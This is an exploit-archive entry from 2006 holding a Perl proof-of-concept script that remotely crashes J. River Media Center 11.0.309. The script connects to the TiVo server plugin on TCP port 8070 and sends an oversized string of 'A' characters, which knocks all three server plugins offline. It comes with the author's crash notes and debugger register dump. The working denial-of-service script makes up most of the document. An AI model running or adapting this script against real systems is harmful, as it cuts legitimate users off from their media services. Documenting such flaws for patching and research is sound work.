J. River Media Center 11.0.309 Remote Denial of Service PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : J. River Media Center 11.0.309 Remote Denial of Service PoC
# Published : 2006-09-05
# Author : n00b
# Previous Title : Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit
# Next Title : dsock <= 1.3 (buf) Remote Buffer Overflow PoC

#!/usr/bin/perl
##Credit to n00b for finding this bug..^ ^
############################################################################
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull exploitation.
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Adresses.
#Shout's to aelph and every-one who has helped me over the year's.
#############################################################################
#   X  Microsoft Visual C ++ Runtime Library
#
#   Buffer overrun detected!
#
#   C:Program FilesJ RiverMedia Center 11Media center.exe
#
#   A Buffer overrun has been detected which has corrupted the program's
#   internal state. The program cannot safely continue execution and must
#   be now terminated.
#                                                   Bah fucking shame..
##############################################################################
#o/s info: win xp sp.2  Media Center 11.0.309 (not registered)
#                       \ DEBUG INFO //
#
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0         nv up ei pl nz na
pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
#SharedUserData!SystemCallStub+0x4:
#7ffe0304 c3               ret
##############################################################################

print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b n";

use IO::Socket;

$ip = $ARGV[0];

$payload = "x41"x5500;

if(!$ip)
{

die "you forgot the ip dumb nutn";

}

$port = '8070';

$protocol = 'tcp';


$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Make sure service is running on the portn";


print $socket $payload;

close($socket);

# www.Syue.com [2006-09-05]